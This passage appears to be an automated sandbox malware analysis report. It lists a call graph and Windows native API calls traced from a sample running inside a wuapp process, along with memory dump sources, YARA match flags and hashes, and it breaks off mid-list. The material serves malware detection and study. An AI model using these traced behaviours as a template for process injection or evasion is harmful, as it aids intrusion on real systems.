LdrLoadDll 68859->68860 68861 11d54b 68860->68861 68861->68489 68862 12a740 68861->68862 68863 12af20 LdrLoadDll 68862->68863 68864 12a75f LookupPrivilegeValueW 68863->68864 68864->68491 68866 12af20 LdrLoadDll 68865->68866 68867 12a1ec 68866->68867 68871 1e9fed0 LdrInitializeThunk 68867->68871 68868 12a20b 68868->68492 68870->68858 68871->68868 68873 11a5d7 68872->68873 68874 11a430 LdrLoadDll 68873->68874 68875 11a606 68874->68875 68875->68431 68877 11a324 68876->68877 68932 129c00 LdrLoadDll 68877->68932 68879 11a35e 68879->68433 68881 11d73c 68880->68881 68882 11a5b0 LdrLoadDll 68881->68882 68883 11d74e 68882->68883 68933 11d620 68883->68933 68886 11d769 68889 12a400 2 API calls 68886->68889 68890 11d774 68886->68890 68887 11d792 68887->68437 68888 11d781 68888->68887 68891 12a400 2 API calls 68888->68891 68889->68890 68890->68437 68891->68887 68893 11b486 68892->68893 68894 11b490 68892->68894 68893->68446 68895 11a430 LdrLoadDll 68894->68895 68896 11b501 68895->68896 68897 11a300 LdrLoadDll 68896->68897 68898 11b515 68897->68898 68899 11b538 68898->68899 68900 11a430 LdrLoadDll 68898->68900 68899->68446 68901 11b554 68900->68901 68902 125640 8 API calls 68901->68902 68903 11b5a9 68902->68903 68903->68446 68905 11c006 68904->68905 68906 11a430 LdrLoadDll 68905->68906 68907 11c01a 68906->68907 68952 11bcd0 68907->68952 68909 11853c 68930 11b5c0 LdrLoadDll 68909->68930 68982 11d9d0 68910->68982 68912 1183e1 68912->68435 68913 1181e3 68913->68912 68987 124f90 68913->68987 68915 118242 68915->68912 68990 117f80 68915->68990 68918 12d050 2 API calls 68919 118289 68918->68919 68920 12d180 3 API calls 68919->68920 68922 11829e 68920->68922 68921 1171c0 4 API calls 68928 1182f0 68921->68928 68922->68928 69049 113660 10 API calls 68922->69049 68927 117480 2 API calls 68927->68928 68928->68912 68928->68921 68928->68927 68995 11b1a0 68928->68995 69045 11d970 68928->69045 69050 11d450 21 API calls 68928->69050 68929->68441 68930->68451 68931->68456 68932->68879 68934 11d63a 68933->68934 68942 11d6f0 68933->68942 68935 11a430 LdrLoadDll 68934->68935 68936 11d65c 68935->68936 68943 129eb0 68936->68943 68938 11d69e 68946 129ef0 68938->68946 68941 12a400 2 API calls 68941->68942 68942->68886 68942->68888 68944 12af20 LdrLoadDll 68943->68944 68945 129ecc 68944->68945 68945->68938 68947 12af20 LdrLoadDll 68946->68947 68948 129f0c 68947->68948 68951 1ea07ac LdrInitializeThunk 68948->68951 68949 11d6e4 68949->68941 68951->68949 68953 11bce7 68952->68953 68961 11da10 68953->68961 68957 11bd5b 68958 11bd62 68957->68958 68973 12a210 LdrLoadDll 68957->68973 68958->68909 68960 11bd75 68960->68909 68962 11da35 68961->68962 68974 1174c0 68962->68974 68964 11da59 68965 125640 8 API calls 68964->68965 68966 11bd2f 68964->68966 68968 12bea0 2 API calls 68964->68968 68981 11d850 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 68964->68981 68965->68964 68969 12a650 68966->68969 68968->68964 68970 12a669 68969->68970 68971 12af20 LdrLoadDll 68970->68971 68972 12a66f CreateProcessInternalW 68971->68972 68972->68957 68973->68960 68975 1175bf 68974->68975 68977 1174d5 68974->68977 68975->68964 68976 125640 8 API calls 68979 117542 68976->68979 68977->68975 68977->68976 68978 117569 68978->68964 68979->68978 68980 12bea0 2 API calls 68979->68980 68980->68978 68981->68964 68983 125a40 LdrLoadDll 68982->68983 68984 11d9ef 68983->68984 68985 11d9f6 SetErrorMode 68984->68985 68986 11d9fd 68984->68986 68985->68986 68986->68913 69051 11d7a0 68987->69051 68989 124fb6 68989->68915 68991 12be20 2 API calls 68990->68991 68994 117fa5 68990->68994 68991->68994 68992 1181c0 68992->68918 68994->68992 69070 1297f0 68994->69070 68996 11b1bf 68995->68996 68997 11b1b9 68995->68997 69127 118bd0 68996->69127 69118 11d260 68997->69118 69000 11b1cc 69001 11b462 69000->69001 69002 12d180 3 API calls 69000->69002 69001->68928 69003 11b1e8 69002->69003 69004 11b1fc 69003->69004 69005 11d970 2 API calls 69003->69005 69136 129c80 69004->69136 69005->69004 69008 11b330 69153 11b140 LdrLoadDll LdrInitializeThunk 69008->69153 69009 129e70 2 API calls 69010 11b27a 69009->69010 69010->69008 69016 11b286 69010->69016 69012 11b34f 69013 11b357 69012->69013 69154 11b0b0 LdrLoadDll NtClose LdrInitializeThunk 69012->69154 69014 12a400 2 API calls 69013->69014 69017 11b361 69014->69017 69016->69001 69019 11b2d9 69016->69019 69021 129f80 2 API calls 69016->69021 69017->68928 69018 11b379 69018->69013 69020 11b380 69018->69020 69022 12a400 2 API calls 69019->69022 69024 11b398 69020->69024 69155 11b030 LdrLoadDll LdrInitializeThunk 69020->69155 69021->69019 69023 11b2f6 69022->69023 69140 1292a0 69023->69140 69156 129d00 LdrLoadDll 69024->69156 69028 11b30d 69028->69001 69143 117630 69028->69143 69029 11b3ac 69157 11aeb0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 69029->69157 69031 11b3d0 69033 11b41d 69031->69033 69158 129d30 LdrLoadDll 69031->69158 69160 129d90 LdrLoadDll 69033->69160 69037 11b3ee 69037->69033 69159 129dc0 LdrLoadDll 69037->69159 69038 11b42b 69039 12a400 2 API calls 69038->69039 69040 11b435 69039->69040 69042 12a400 2 API calls 69040->69042 69043 11b43f 69042->69043 69043->69001 69044 117630 3 API calls 69043->69044 69044->69001 69046 11d983 69045->69046 69235 129e00 69046->69235 69049->68928 69050->68928 69052 11d7bd 69051->69052 69058 129f30 69052->69058 69055 11d805 69055->68989 69059 12af20 LdrLoadDll 69058->69059 69060 129f4c 69059->69060 69068 1e9ffb4 LdrInitializeThunk 69060->69068 69061 11d7fe 69061->69055 69063 129f80 69061->69063 69064 129f9c 69063->69064 69065 12af20 LdrLoadDll 69063->69065 69069 1e9fc60 LdrInitializeThunk 69064->69069 69065->69064 69066 11d82e 69066->68989 69068->69061 69069->69066 69071 12c070 2 API calls 69070->69071 69072 129807 69071->69072 69091 118710 69072->69091 69074 129822 69075 129860 69074->69075 69076 129849 69074->69076 69079 12be20 2 API calls 69075->69079 69077 12bea0 2 API calls 69076->69077 69078 129856 69077->69078 69078->68992 69080 12989a 69079->69080 69081 12be20 2 API calls 69080->69081 69082 1298b3 69081->69082 69088 129b54 69082->69088 69097 12be60 LdrLoadDll 69082->69097 69084 129b39 69085 129b40 69084->69085 69084->69088 69086 12bea0 2 API calls 69085->69086 69087 129b4a 69086->69087 69087->68992 69089 12bea0 2 API calls 69088->69089 69090 129ba9 69089->69090 69090->68992 69092 118735 69091->69092 69093 11a0e0 LdrLoadDll 69092->69093 69094 118768 69093->69094 69095 11878d 69094->69095 69098 11b8e0 69094->69098 69095->69074 69097->69084 69099 11b90c 69098->69099 69100 12a150 LdrLoadDll 69099->69100 69101 11b925 69100->69101 69102 11b92c 69101->69102 69109 12a190 69101->69109 69102->69095 69106 11b967 69107 12a400 2 API calls 69106->69107 69108 11b98a 69107->69108 69108->69095 69110 12af20 LdrLoadDll 69109->69110 69111 12a1ac 69110->69111 69117 1e9fbb8 LdrInitializeThunk 69111->69117 69112 11b94f 69112->69102 69114 12a780 69112->69114 69115 12a79f 69114->69115 69116 12af20 LdrLoadDll 69114->69116 69115->69106 69116->69115 69117->69112 69119 11d277 69118->69119 69161 11c350 69118->69161 69121 11d290 69119->69121 69174 113fb0 69119->69174 69122 12c070 2 API calls 69121->69122 69125 11d29e 69122->69125 69124 11d28a 69201 129120 69124->69201 69125->68996 69128 118beb 69127->69128 69129 11d620 3 API calls 69128->69129 69135 118d0b 69128->69135 69130 118cec 69129->69130 69131 118d1a 69130->69131 69133 12a400 2 API calls 69130->69133 69134 118d01 69130->69134 69131->69000 69133->69134 69234 116240 LdrLoadDll 69134->69234 69135->69000 69137 129c95 69136->69137 69138 12af20 LdrLoadDll 69137->69138 69139 11b250 69138->69139 69139->69001 69139->69008 69139->69009 69141 11d970 2 API calls 69140->69141 69142 1292d2 69140->69142 69141->69142 69142->69028 69144 117648 69143->69144 69145 11a0e0 LdrLoadDll 69144->69145 69146 117663 69145->69146 69147 125a40 LdrLoadDll 69146->69147 69148 117673 69147->69148 69149 11767c PostThreadMessageW 69148->69149 69150 1176ad 69148->69150 69149->69150 69151 117690 69149->69151 69150->68928 69152 11769a PostThreadMessageW 69151->69152 69152->69150 69153->69012 69154->69018 69155->69024 69156->69029 69157->69031 69158->69037 69159->69033 69160->69038 69162 11c383 69161->69162 69206 11a6f0 69162->69206 69164 11c395 69210 11a860 69164->69210 69166 11c3b3 69167 11a860 LdrLoadDll 69166->69167 69168 11c3c9 69167->69168 69169 11d7a0 3 API calls 69168->69169 69170 11c3ed 69169->69170 69171 11c3f4 69170->69171 69213 12c0b0 LdrLoadDll RtlAllocateHeap 69170->69213 69171->69119 69173 11c404 69173->69119 69175 113fdc 69174->69175 69176 11b8e0 3 API calls 69175->69176 69178 1140b3 69176->69178 69177 11463b 69177->69124 69178->69177 69214 12c0f0 69178->69214 69180 11411e 69181 11a430 LdrLoadDll 69180->69181 69182 1142a4 69181->69182 69183 11a430 LdrLoadDll 69182->69183 69184 1142c8 69183->69184 69218 11b9a0 69184->69218 69188 114363 69189 11b9a0 2 API calls 69188->69189 69190 114429 69188->69190 69191 114402 69189->69191 69192 12be20 2 API calls 69190->69192 69191->69190 69194 12a090 2 API calls 69191->69194 69193 114496 69192->69193 69195 12be20 2 API calls 69193->69195 69194->69190 69196 1144af 69195->69196 69196->69177 69197 11a430 LdrLoadDll 69196->69197 69198 1144ed 69197->69198 69199 11a300 LdrLoadDll 69198->69199 69200 11459f 69199->69200 69200->69124 69202 125a40 LdrLoadDll 69201->69202 69203 129141 69202->69203 69204 129167 69203->69204 69205 129154 CreateThread 69203->69205 69204->69121 69205->69121 69207 11a717 69206->69207 69208 11a430 LdrLoadDll 69207->69208 69209 11a753 69208->69209 69209->69164 69211 11a430 LdrLoadDll 69210->69211 69212 11a879 69210->69212 69211->69212 69212->69166 69213->69173 69215 12c0fd 69214->69215 69216 125a40 LdrLoadDll 69215->69216 69217 12c110 69216->69217 69217->69180 69219 11b9c5 69218->69219 69227 12a000 69219->69227 69222 12a090 69223 12af20 LdrLoadDll 69222->69223 69224 12a0ac 69223->69224 69233 1e9fab8 LdrInitializeThunk 69224->69233 69225 12a0cb 69225->69188 69228 12af20 LdrLoadDll 69227->69228 69229 12a01c 69228->69229 69232 1e9fb50 LdrInitializeThunk 69229->69232 69230 11433c 69230->69188 69230->69222 69232->69230 69233->69225 69234->69135 69236 129e1c 69235->69236 69237 12af20 LdrLoadDll 69235->69237 69240 1e9fd8c LdrInitializeThunk 69236->69240 69237->69236 69238 11d9ae 69238->68928 69240->69238

                                                        Executed Functions

                                                        Function 0012A28A Relevance: 1.6, APIs: 1, Instructions: 62filenativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 619 12a28a-12a28f 620 12a291-12a2a6 619->620 621 12a2e6-12a321 call 12af20 NtCreateFile 619->621 623 12a2ac-12a2c9 620->623 624 12a2a7 call 12af20 620->624 624->623
                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,00000005,00000000,001257A7,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,001257A7,00000000,00000005,00000060,00000000,00000000), ref: 0012A31D
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 0e6f602c42f14cc5e16e1ed26be39846bed8539e117ae552000b1057516d79ba
                                                        • Instruction ID: 928d8cd593df555682a67eb3d14201e18740c3b6feef237e91f79440cb9d0db3
                                                        • Opcode Fuzzy Hash: 0e6f602c42f14cc5e16e1ed26be39846bed8539e117ae552000b1057516d79ba
                                                        • Instruction Fuzzy Hash: 1811CEB2204108ABCB18DF88ED85DEB77ADEF8C754F108608FA0D97245D630E861CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0012A2CA Relevance: 1.5, APIs: 1, Instructions: 43filenativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 651 12a2ca-12a321 call 12af20 NtCreateFile
                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,00000005,00000000,001257A7,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,001257A7,00000000,00000005,00000060,00000000,00000000), ref: 0012A31D
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 34416b3c67aabb50b3260deba280d7f321ba982010436e84802275f453fc1dae
                                                        • Instruction ID: 5c4005991c0dfc2f99eb6ab37daa5bbae489e7e97368593a1ad532225aafe005
                                                        • Opcode Fuzzy Hash: 34416b3c67aabb50b3260deba280d7f321ba982010436e84802275f453fc1dae
                                                        • Instruction Fuzzy Hash: A701A4B2200108AFCB48CF98DC85DEB37A9AF8C354F118259FA0DD7255D630E851CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0012A2D0 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,00000005,00000000,001257A7,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,001257A7,00000000,00000005,00000060,00000000,00000000), ref: 0012A31D
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
                                                        • Instruction ID: 05c6136831665a7db2c1c06687f6694819d4ab34231229cfebf32cde63c2942a
                                                        • Opcode Fuzzy Hash: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
                                                        • Instruction Fuzzy Hash: 79F06DB6215208AFCB48DF89DC85EEB77ADAF8C754F118248BA0997245D630F8518BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0012A380 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtReadFile.NTDLL(00125962,5DB515AF,FFFFFFFF,00125621,00000206,?,00125962,00000206,00125621,FFFFFFFF,5DB515AF,00125962,00000206,00000000), ref: 0012A3C5
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
                                                        • Instruction ID: ca19913c4145ae4f9aad6efc8169e3c4a99abf8a2bbff5c29675975ae4f5a00f
                                                        • Opcode Fuzzy Hash: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
                                                        • Instruction Fuzzy Hash: B6F0A4B2200208ABCB14DF99DC85EEB77ADAF8C754F118248BA0D97245D630E811CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0012A4AA Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00112D11,00002000,00003000,00000004), ref: 0012A4E9
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: dc16da0520ef190a3e8130b28335fede87111d9001cde4ac03091b5b427adf8d
                                                        • Instruction ID: 0aeb6ef558aa81bceff9fe8606a1d6ccd8037d8bda53d8cc90d1af36294164b1
                                                        • Opcode Fuzzy Hash: dc16da0520ef190a3e8130b28335fede87111d9001cde4ac03091b5b427adf8d
                                                        • Instruction Fuzzy Hash: EDF0F8B6210114AFDB14DF98DD81EEB77A9EF88354F118149FE59A7241C630E811CBE0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0012A4B0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00112D11,00002000,00003000,00000004), ref: 0012A4E9
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
                                                        • Instruction ID: a4e7422d8f3ac20b69194f42acfae16fa09eb01913eab41ad8d93e5edd72502b
                                                        • Opcode Fuzzy Hash: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
                                                        • Instruction Fuzzy Hash: DFF015B2210218ABDB14DF89DC81EAB77ADAF8C754F018108BE0897241C630F810CBB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0012A400 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtClose.NTDLL(00125940,00000206,?,00125940,00000005,FFFFFFFF), ref: 0012A425
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
                                                        • Instruction ID: d83c345c475b5c423e0729b2d9849c85169cf34b47ee2783d210f34fedd505dd
                                                        • Opcode Fuzzy Hash: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
                                                        • Instruction Fuzzy Hash: 2BD01772200214ABD720EB98EC89E9B7BACDF48660F018055BA485B242C630FA1086E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EA00C4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                        • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                        • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                        • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EA07AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                        • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                        • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                        • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                        • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                        • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                        • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9F900 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                        • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                        • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                        • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9FBB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                        • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                        • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                        • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
